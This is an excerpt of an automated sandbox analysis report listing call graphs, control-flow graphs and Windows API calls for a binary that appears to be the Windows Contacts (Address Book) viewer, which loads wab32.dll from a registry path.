856->857 857->853 859 5f2f07 858->859 859->859 861 5f2d2b 859->861 862 5f2e3f 859->862 861->848 861->851 863 5f2e83 862->863 864 5f2e8f 863->864 865 5f2e9f LocalAlloc 863->865 864->861 865->864 866 5f2eaf 865->866 867 5f2ee8 LocalFree 866->867 870 5f2deb 866->870 867->864 869 5f2eda 869->867 871 5f2df8 870->871 872 5f2e1c 870->872 871->872 873 5f2e06 IsDBCSLeadByte 871->873 872->869 873->871 873->872 880 5f3450 SetUnhandledExceptionFilter 881 5f3790 _except_handler4_common 882 5f25b0 883 5f25be DefWindowProcW 882->883 884 5f25c5 PostQuitMessage 882->884 883->884 890 5f3400 891 5f343d 890->891 893 5f3412 890->893 892 5f3437 ?terminate@ 892->891 893->891 893->892 894 5f2f80 895 5f2f85 894->895 903 5f34d8 GetModuleHandleW 895->903 897 5f2f91 __set_app_type __p__fmode __p__commode 898 5f2fc9 897->898 899 5f2fde 898->899 900 5f2fd2 __setusermatherr 898->900 905 5f370d _controlfp 899->905 900->899 902 5f2fe3 904 5f34e9 903->904 904->897 905->902

                                                                            Callgraph

                                                                            • Executed
                                                                            • Not Executed
                                                                            • Opacity -> Relevance
                                                                            • Disassembly available
                                                                            callgraph 0 Function_005F1C5C 4 Function_005F25D3 0->4 9 Function_005F19C7 0->9 19 Function_005F1BF4 0->19 20 Function_005F37F0 0->20 23 Function_005F1AE4 0->23 32 Function_005F1B83 0->32 40 Function_005F193A 0->40 45 Function_005F1AB0 0->45 46 Function_005F32B0 0->46 50 Function_005F29AB 0->50 54 Function_005F1B21 0->54 1 Function_005F34D8 24 Function_005F3464 1->24 2 Function_005F1B57 25 Function_005F2B60 2->25 3 Function_005F2BD5 14 Function_005F2A7E 3->14 4->2 4->25 26 Function_005F1A60 4->26 4->46 5 Function_005F31D3 6 Function_005F2F51 7 Function_005F3450 8 Function_005F324A 10 Function_005F37C2 10->6 11 Function_005F32C0 12 Function_005F3640 13 Function_005F2D7F 15 Function_005F2CFB 16 Function_005F2EF8 15->16 38 Function_005F2E3F 16->38 17 Function_005F13F8 18 Function_005F3675 19->46 52 Function_005F28A4 19->52 21 Function_005F376D 22 Function_005F2DEB 51 Function_005F3728 24->51 25->14 27 Function_005F361E 28 Function_005F3219 29 Function_005F3790 30 Function_005F370D 31 Function_005F360B 32->46 32->52 33 Function_005F3001 34 Function_005F3580 34->12 47 Function_005F3530 34->47 35 Function_005F3400 36 Function_005F1B80 37 Function_005F2F80 37->1 37->8 37->30 55 Function_005F3520 37->55 38->13 38->22 39 Function_005F31BF 40->46 41 Function_005F2C36 41->3 41->14 41->15 41->23 41->45 41->46 42 Function_005F34B5 43 Function_005F34B1 44 Function_005F3030 44->0 44->18 44->28 44->34 44->51 46->11 48 Function_005F18B0 49 Function_005F25B0 53 Function_005F2A21 50->53 52->26 52->46 54->41

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 5f1c5c-5f1d16 call 5f37f0 memset GetCommandLineW call 5f1ab0 HeapSetInformation 5 5f1d18-5f1d1b 0->5 6 5f1d20-5f1e08 call 5f29ab call 5f1bf4 LoadStringW LoadIconW GetStockObject RegisterClassW CreateWindowExW 0->6 7 5f1faf 5->7 6->7 24 5f1e0e-5f1e20 call 5f1b83 6->24 10 5f1fb1-5f1fb9 7->10 12 5f1fde-5f1fe6 10->12 13 5f1fbb-5f1fd5 10->13 14 5f200d-5f2014 12->14 15 5f1fe8-5f2004 12->15 13->12 27 5f1fd7-5f1fdc 13->27 17 5f201a-5f2029 FreeLibrary 14->17 18 5f2560 14->18 15->14 32 5f2006-5f200b 15->32 22 5f2562-5f2569 17->22 18->22 25 5f256b-5f2572 FreeLibrary 22->25 26 5f2578-5f25aa call 5f1ae4 * 2 call 5f32b0 22->26 35 5f1e2f-5f1e45 call 5f25d3 24->35 36 5f1e22 GetLastError 24->36 25->26 27->12 32->14 35->7 43 5f1e4b-5f1e62 call 5f193a 35->43 37 5f1e28-5f1e2a 36->37 37->7 46 5f1e68-5f1e76 43->46 47 5f1ef0 43->47 48 5f1e78-5f1e88 46->48 49 5f1ef2-5f1f1d EventUnregister 46->49 47->49 48->49 50 5f1e8a-5f1e8c 48->50 51 5f1f1f-5f1f62 memset LoadStringW MessageBoxW 49->51 52 5f1f6d-5f1f73 49->52 50->49 56 5f1e8e-5f1eee call 5f19c7 50->56 53 5f1f68-5f1f6b 51->53 54 5f202e-5f2034 52->54 55 5f1f79-5f1f8b GetProcAddress 52->55 53->10 60 5f206a-5f2070 54->60 61 5f2036 54->61 57 5f1f8d-5f1f95 55->57 58 5f1fac-5f1fae 55->58 56->49 73 5f1f99-5f1f9b 57->73 58->7 62 5f2076-5f207c 60->62 63 5f2072-5f2074 60->63 65 5f2038-5f2048 GetProcAddress 61->65 67 5f207e-5f2080 62->67 68 5f2082-5f2084 62->68 63->65 65->58 69 5f204e-5f205c 65->69 67->65 70 5f208a-5f2098 68->70 71 5f2086-5f2088 68->71 88 5f205e-5f2063 69->88 89 5f2065 69->89 74 5f209a-5f20a1 70->74 75 5f20b3-5f20b9 70->75 71->65 78 5f1f9d-5f1fa2 73->78 79 5f1fa4-5f1fa6 73->79 80 5f20ab-5f20b1 74->80 81 5f20a3-5f20a9 74->81 76 5f20bb-5f20c2 75->76 77 5f20d4-5f20da 75->77 83 5f20cc-5f20d2 76->83 84 5f20c4-5f20ca 76->84 86 5f20dc-5f20e3 77->86 87 5f20f5-5f20fd 77->87 78->79 79->37 79->58 82 5f210f-5f2116 80->82 81->82 82->53 93 
5f211c-5f2130 GetProcAddress 82->93 83->82 84->82 90 5f20ed-5f20f3 86->90 91 5f20e5-5f20eb 86->91 87->82 92 5f20ff-5f2109 87->92 88->89 89->58 90->82 91->82 92->82 93->53 94 5f2136-5f2179 93->94 97 5f217b-5f2180 94->97 98 5f2182-5f2186 94->98 97->98 99 5f218c-5f21a7 memset 98->99 100 5f2225-5f2228 98->100 101 5f21ec 99->101 102 5f21a9-5f21af 99->102 103 5f222a-5f2247 100->103 104 5f2251-5f2254 100->104 109 5f21f1-5f221a LoadStringW 101->109 105 5f21e5-5f21ea 102->105 106 5f21b1-5f21b7 102->106 122 5f224a 103->122 107 5f2256-5f227f 104->107 108 5f2281-5f2284 104->108 105->109 111 5f21de-5f21e3 106->111 112 5f21b9-5f21bf 106->112 107->122 113 5f22c7-5f22ca 108->113 114 5f2286-5f2291 108->114 109->100 111->109 117 5f21d7-5f21dc 112->117 118 5f21c1-5f21d5 112->118 115 5f2384-5f2387 113->115 116 5f22d0-5f22e4 call 5f1b21 113->116 120 5f2299-5f22c5 114->120 121 5f2293 114->121 123 5f238d-5f239f GetProcAddress 115->123 124 5f242a-5f242d 115->124 116->53 133 5f22ea-5f22f5 116->133 117->109 118->109 120->122 121->120 122->104 123->58 129 5f23a5-5f23c6 123->129 126 5f2433-5f2445 GetProcAddress 124->126 127 5f24d0-5f24d6 124->127 126->58 132 5f244b-5f246c 126->132 134 5f2519-5f251f 127->134 135 5f24d8-5f24ea GetProcAddress 127->135 149 5f23cf-5f23d1 129->149 150 5f23c8-5f23cd 129->150 152 5f246e-5f2473 132->152 153 5f2475-5f2477 132->153 139 5f22fd-5f2320 133->139 140 5f22f7 133->140 134->53 137 5f2525-5f2537 GetProcAddress 134->137 135->58 141 5f24f0-5f2514 135->141 137->58 143 5f253d-5f255b 137->143 159 5f2329-5f232b 139->159 160 5f2322-5f2327 139->160 140->139 141->134 143->18 149->58 154 5f23d7-5f23dc 149->154 150->149 152->153 153->58 156 5f247d-5f2482 153->156 154->58 158 5f23e2-5f241f memset LoadStringW 154->158 156->58 162 5f2488-5f24c5 memset LoadStringW 156->162 158->124 159->58 161 5f2331-5f2336 159->161 160->159 161->58 163 5f233c-5f2379 memset LoadStringW 161->163 162->127 163->115
                                                                            APIs
                                                                            • memset.MSVCRT ref: 005F1CC6
                                                                            • GetCommandLineW.KERNEL32 ref: 005F1CCE
                                                                            • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 005F1D0E
                                                                            • LoadStringW.USER32(00000000,000007D1,?,00000104), ref: 005F1D49
                                                                            • LoadIconW.USER32 ref: 005F1D84
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 005F1D96
                                                                            • GetStockObject.GDI32(00000000), ref: 005F1DA3
                                                                            • RegisterClassW.USER32(00000003), ref: 005F1DCD
                                                                            • CreateWindowExW.USER32(00000000,Contacts Viewer,?,00CF0000,00000000,00000000,0000012C,000000C8,00000000,00000000,00000000), ref: 005F1DF8
                                                                            • GetLastError.KERNEL32 ref: 005F1E22
                                                                            • FreeLibrary.KERNELBASE(?), ref: 005F201B
                                                                            • FreeLibrary.KERNELBASE(?), ref: 005F256C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: Load$FreeLibrary$ClassCommandCreateCursorErrorHeapIconInformationLastLineObjectRegisterStockStringWindowmemset
                                                                            • String ID: $API Entered$Contacts Viewer$WABOpen$(=u
                                                                            • API String ID: 328653217-4017187306
                                                                            • Opcode ID: e38c6b0da74b47b495c85f31d37b1b557d35df409f03663f9ae865e9355b77c7
                                                                            • Instruction ID: 2ddcfeb9f38256e6c155306202269762adf037d5b4383f5cd2e3d6000dc6131f
                                                                            • Opcode Fuzzy Hash: e38c6b0da74b47b495c85f31d37b1b557d35df409f03663f9ae865e9355b77c7
                                                                            • Instruction Fuzzy Hash: 853292B594061DDBDB248B14DC89BFA7BB9BB94300F1400A9EB09E72A0DB7C9D84DF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 164 5f3030-5f3061 call 5f3675 call 5f3728 GetStartupInfoW 170 5f3063-5f3072 164->170 171 5f308c-5f308e 170->171 172 5f3074-5f3076 170->172 173 5f308f-5f3095 171->173 174 5f307f-5f308a Sleep 172->174 175 5f3078-5f307d 172->175 176 5f3097-5f309f _amsg_exit 173->176 177 5f30a1-5f30a7 173->177 174->170 175->173 178 5f30db-5f30e1 176->178 179 5f30a9-5f30c2 call 5f3219 177->179 180 5f30d5 177->180 182 5f30fe-5f3100 178->182 183 5f30e3-5f30f4 _initterm 178->183 179->178 187 5f30c4-5f30d0 179->187 180->178 185 5f310b-5f3112 182->185 186 5f3102-5f3109 182->186 183->182 188 5f3137-5f3141 185->188 189 5f3114-5f3121 call 5f3580 185->189 186->185 191 5f3209-5f3218 187->191 190 5f3144-5f3149 188->190 189->188 196 5f3123-5f3135 189->196 193 5f314b-5f314d 190->193 194 5f3195-5f3198 190->194 199 5f314f-5f3151 193->199 200 5f3164-5f3168 193->200 197 5f319a-5f31a3 194->197 198 5f31a6-5f31b3 _ismbblead 194->198 196->188 197->198 201 5f31b9-5f31bd 198->201 202 5f31b5-5f31b6 198->202 199->194 203 5f3153-5f3155 199->203 204 5f316a-5f316e 200->204 205 5f3170-5f3172 200->205 201->190 207 5f31ee-5f31f5 201->207 202->201 203->200 208 5f3157-5f315a 203->208 209 5f3173-5f318c call 5f1c5c 204->209 205->209 210 5f31f7-5f31fd _cexit 207->210 211 5f3202 207->211 208->200 212 5f315c-5f3162 208->212 209->207 215 5f318e-5f318f exit 209->215 210->211 211->191 212->203 215->194
                                                                            APIs
                                                                              • Part of subcall function 005F3675: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 005F36A2
                                                                              • Part of subcall function 005F3675: GetCurrentProcessId.KERNEL32 ref: 005F36B1
                                                                              • Part of subcall function 005F3675: GetCurrentThreadId.KERNEL32 ref: 005F36BA
                                                                              • Part of subcall function 005F3675: GetTickCount.KERNEL32 ref: 005F36C3
                                                                              • Part of subcall function 005F3675: QueryPerformanceCounter.KERNEL32(?), ref: 005F36D8
                                                                            • GetStartupInfoW.KERNEL32(?,005F3838,00000058), ref: 005F304F
                                                                            • Sleep.KERNEL32(000003E8), ref: 005F3084
                                                                            • _amsg_exit.MSVCRT ref: 005F3099
                                                                            • _initterm.MSVCRT ref: 005F30ED
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 005F3119
                                                                            • exit.KERNELBASE ref: 005F318F
                                                                            • _ismbblead.MSVCRT ref: 005F31AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                            • String ID:
                                                                            • API String ID: 836923961-0
                                                                            • Opcode ID: a49aaa0e0fb5ae64b33187a31d2cd60cf8a25f29b2a8f139337eb8d6a5966031
                                                                            • Instruction ID: 538df5f60a98c304830b9b1283719a34dc5ec8fb7e26ee7d1f6dd25bb2eb9a0c
                                                                            • Opcode Fuzzy Hash: a49aaa0e0fb5ae64b33187a31d2cd60cf8a25f29b2a8f139337eb8d6a5966031
                                                                            • Instruction Fuzzy Hash: 7E41C17594471DDBEB219B54D809B7ABFE8FB54720F20042AEB42D7290DF7C8A84DB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 216 5f28a4-5f28e8 memset 217 5f28ee-5f2912 RegOpenKeyExW 216->217 218 5f299d-5f29aa call 5f32b0 216->218 220 5f2989-5f298f 217->220 221 5f2914-5f2947 RegQueryValueExW 217->221 220->218 222 5f2991-5f2997 RegCloseKey 220->222 221->220 224 5f2949-5f2956 221->224 222->218 225 5f296d-5f2977 GetFileAttributesW 224->225 226 5f2958-5f296b ExpandEnvironmentStringsW 224->226 225->220 227 5f2979-5f2984 call 5f1a60 225->227 226->220 227->220
                                                                            APIs
                                                                            • memset.MSVCRT ref: 005F28DE
                                                                            • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 005F290A
                                                                            • RegQueryValueExW.KERNELBASE(?,005F11FC,00000000,?,?,?,?,00000000,00000000), ref: 005F293F
                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 005F295F
                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 005F296E
                                                                            • RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 005F2997
                                                                            Strings
                                                                            • Software\Microsoft\WAB\DLLPath, xrefs: 005F2900
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesCloseEnvironmentExpandFileOpenQueryStringsValuememset
                                                                            • String ID: Software\Microsoft\WAB\DLLPath
                                                                            • API String ID: 2763597636-3156921957
                                                                            • Opcode ID: f7fa21d3261a4b70e8a94f82ab9894914195922991074286f777e0cbd29e185c
                                                                            • Instruction ID: 93eefcce8eb0d6bace34e7693a480338bae74319cd31a34fb4318175a1da8cad
                                                                            • Opcode Fuzzy Hash: f7fa21d3261a4b70e8a94f82ab9894914195922991074286f777e0cbd29e185c
                                                                            • Instruction Fuzzy Hash: B52197B194121CAADB209B50CD4CEFBBBBCBF54710F000295A619E3150EB744BC4CEA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 229 5f1bf4-5f1c26 call 5f28a4 PathRemoveFileSpecW 232 5f1c4d-5f1c5b call 5f32b0 229->232 233 5f1c28-5f1c3c PathAppendW 229->233 233->232 234 5f1c3e-5f1c4b LoadLibraryW 233->234 234->232
                                                                            APIs
                                                                              • Part of subcall function 005F28A4: memset.MSVCRT ref: 005F28DE
                                                                              • Part of subcall function 005F28A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 005F290A
                                                                              • Part of subcall function 005F28A4: RegQueryValueExW.KERNELBASE(?,005F11FC,00000000,?,?,?,?,00000000,00000000), ref: 005F293F
                                                                              • Part of subcall function 005F28A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 005F295F
                                                                              • Part of subcall function 005F28A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 005F2997
                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 005F1C1E
                                                                            • PathAppendW.SHLWAPI(?,wab32res.dll), ref: 005F1C34
                                                                            • LoadLibraryW.KERNELBASE(?), ref: 005F1C45
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: Path$AppendCloseEnvironmentExpandFileLibraryLoadOpenQueryRemoveSpecStringsValuememset
                                                                            • String ID: wab32res.dll
                                                                            • API String ID: 1705514897-2698570859
                                                                            • Opcode ID: 50144f714c26c0b021701703795e33dcb1dfd08fd3a393854562928d7a56d9c0
                                                                            • Instruction ID: d640dd202892dafdbecb46633234992015dee39ad54c036c06179a50c6b48ec3
                                                                            • Opcode Fuzzy Hash: 50144f714c26c0b021701703795e33dcb1dfd08fd3a393854562928d7a56d9c0
                                                                            • Instruction Fuzzy Hash: 05F03075A0261CEBCB10EBB4DC4DABE7BBCBB54740F504195A611D7141EF38DE08CA94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 237 5f1b83-5f1bc1 memset call 5f28a4 240 5f1bc4-5f1bcd 237->240 240->240 241 5f1bcf-5f1bda 240->241 242 5f1bdc 241->242 243 5f1be1-5f1bf3 LoadLibraryW call 5f32b0 241->243 242->243
                                                                            APIs
                                                                            • memset.MSVCRT ref: 005F1BA8
                                                                              • Part of subcall function 005F28A4: memset.MSVCRT ref: 005F28DE
                                                                              • Part of subcall function 005F28A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 005F290A
                                                                              • Part of subcall function 005F28A4: RegQueryValueExW.KERNELBASE(?,005F11FC,00000000,?,?,?,?,00000000,00000000), ref: 005F293F
                                                                              • Part of subcall function 005F28A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 005F295F
                                                                              • Part of subcall function 005F28A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 005F2997
                                                                            • LoadLibraryW.KERNELBASE(?,?,00000000), ref: 005F1BE2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: memset$CloseEnvironmentExpandLibraryLoadOpenQueryStringsValue
                                                                            • String ID: wab32.dll
                                                                            • API String ID: 2792020168-2849205143
                                                                            • Opcode ID: a91c4b1861e6253a4b27bc02533123cd993b948a03530a10b11f74087e39e442
                                                                            • Instruction ID: b4d375630cf479ed21cab1f13766a7526b64aee853e7cae267096266f9d61dc7
                                                                            • Opcode Fuzzy Hash: a91c4b1861e6253a4b27bc02533123cd993b948a03530a10b11f74087e39e442
                                                                            • Instruction Fuzzy Hash: A1F0F67580121C97CB24EB68DC4E9FA7BB8FF50340FA04194AA16D7181EA389F49CA84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 246 5f29ab-5f29ca CommandLineToArgvW 247 5f29cc-5f29ea call 5f2a21 LocalFree 246->247 248 5f2a15 246->248 250 5f2a1a-5f2a20 247->250 252 5f29ec-5f2a03 call 5f2a21 247->252 248->250 255 5f2a08-5f2a13 RegisterApplicationRestart 252->255 256 5f2a05 252->256 255->250 256->255
                                                                            APIs
                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 005F29C0
                                                                            • LocalFree.KERNEL32(00000000,?), ref: 005F29DE
                                                                            • RegisterApplicationRestart.KERNELBASE(005F1428,00000000,00000000), ref: 005F2A0B
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: ApplicationArgvCommandFreeLineLocalRegisterRestart
                                                                            • String ID:
                                                                            • API String ID: 3182635576-0
                                                                            • Opcode ID: 7b1ea399fe2c3d7b89c60f8a651b19e98c7f499dc71cf3960556c9b22ad221c9
                                                                            • Instruction ID: 3097be8079179b5681417ccbdc2cddb4648ca500b03b3d0309362ed4452014e0
                                                                            • Opcode Fuzzy Hash: 7b1ea399fe2c3d7b89c60f8a651b19e98c7f499dc71cf3960556c9b22ad221c9
                                                                            • Instruction Fuzzy Hash: 4601527291021DBBDB11CBD5D889BBDBBACFB84361F500065E601E7141DBB89E04DAA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 258 5f25d3-5f265b memset * 2 CommandLineToArgvW 259 5f2891-5f28a1 call 5f32b0 258->259 260 5f2661-5f2667 258->260 261 5f287d-5f2886 LocalFree 260->261 262 5f266d-5f2674 260->262 261->259 264 5f2888-5f2890 261->264 265 5f2676-5f267e 262->265 266 5f2683-5f269e StrCmpNIW 262->266 264->259 265->261 268 5f26f0-5f26f9 266->268 269 5f26a0-5f26a7 266->269 271 5f26fb-5f271c call 5f1a60 PathFindExtensionW 268->271 272 5f2757-5f275f 268->272 270 5f26aa-5f26b3 269->270 270->270 273 5f26b5-5f26b9 270->273 281 5f271e-5f272e StrCmpIW 271->281 274 5f2761-5f2770 StrCmpIW 272->274 277 5f26bb-5f26bd 273->277 278 5f2736-5f273c 273->278 279 5f2785-5f27a2 274->279 280 5f2772-5f2781 274->280 283 5f26cf-5f26dd 277->283 284 5f26bf-5f26cd call 5f1b57 277->284 282 5f2877 278->282 286 5f27a8-5f27b0 279->286 287 5f2873-5f2875 279->287 280->274 285 5f2783 280->285 288 5f2741-5f2751 281->288 289 5f2730-5f2734 281->289 282->261 283->261 293 5f26e3-5f26eb 283->293 284->283 285->278 291 5f27c5-5f27e3 call 5f1a60 GetFileAttributesW 286->291 292 5f27b2-5f27b5 286->292 287->282 288->272 289->278 289->281 302 5f27e5-5f27ec 291->302 303 5f2833-5f2835 291->303 295 5f2818-5f2825 292->295 296 5f27b7-5f27be 292->296 293->261 299 5f282c-5f2831 295->299 300 5f2827-5f282a 295->300 296->295 301 5f27c0 296->301 299->261 300->291 301->291 304 5f27ee-5f27fd PathRemoveFileSpecW 302->304 305 5f2811-5f2816 302->305 306 5f2837-5f283e 303->306 307 5f2840-5f2848 303->307 304->305 308 5f27ff-5f280f GetFileAttributesW 304->308 305->282 306->305 306->307 309 5f284b-5f2854 307->309 308->303 308->305 309->309 310 5f2856-5f2871 call 5f2b60 309->310 310->282 310->287
                                                                            APIs
                                                                            • memset.MSVCRT ref: 005F261B
                                                                            • memset.MSVCRT ref: 005F2633
                                                                            • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 005F264D
                                                                            • StrCmpNIW.SHLWAPI(?,/LDAP:,00000006,?,?,?,00000000,00000000,00000001), ref: 005F268D
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000001), ref: 005F287E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ArgvCommandFreeLineLocal
                                                                            • String ID: /LDAP:
                                                                            • API String ID: 439219084-3282177907
                                                                            • Opcode ID: abb53fcfa5b89d20268fb725b825071c0075dbc08def575d5242678a3b2df961
                                                                            • Instruction ID: af794d904e20e876967d84c9ea3b1ddbef5acc33114993491504b9c23bdb9e14
                                                                            • Opcode Fuzzy Hash: abb53fcfa5b89d20268fb725b825071c0075dbc08def575d5242678a3b2df961
                                                                            • Instruction Fuzzy Hash: 1381E2B1A4121C9BCB24DF24CC8CABABBB9FF54340F1445A9E60AD7251DB389E84CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 313 5f2a7e-5f2a8c 314 5f2a8e-5f2a90 313->314 315 5f2a95-5f2aa1 313->315 316 5f2b5b-5f2b5d 314->316 317 5f2aaa 315->317 318 5f2aa3 315->318 319 5f2aac-5f2ab3 317->319 318->319 320 5f2aa5-5f2aa8 318->320 321 5f2ab7-5f2abb 319->321 322 5f2ab5 319->322 320->317 320->319 323 5f2b54 321->323 324 5f2ac1-5f2ac3 321->324 322->321 325 5f2b59-5f2b5a 323->325 324->323 326 5f2ac9-5f2add GetProcessHeap HeapAlloc 324->326 325->316 326->323 327 5f2adf-5f2ae3 326->327 328 5f2b1c-5f2b22 327->328 329 5f2ae5-5f2afd memcpy 327->329 332 5f2b2d-5f2b31 328->332 333 5f2b24-5f2b2b 328->333 330 5f2aff-5f2b06 329->330 331 5f2b0b-5f2b0f 329->331 330->330 334 5f2b08 330->334 331->332 335 5f2b11-5f2b18 331->335 336 5f2b44-5f2b52 332->336 337 5f2b33-5f2b3e GetProcessHeap HeapFree 332->337 333->332 333->333 334->331 335->335 338 5f2b1a 335->338 336->325 337->336 338->332
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00000000,m(_,?,005F2BA4,?,?,8000FFFF,00000000,?,?,?,005F286D,?), ref: 005F2ACC
                                                                            • HeapAlloc.KERNEL32(00000000,?,005F2BA4,?,?,8000FFFF,00000000,?,?,?,005F286D,?,?), ref: 005F2AD3
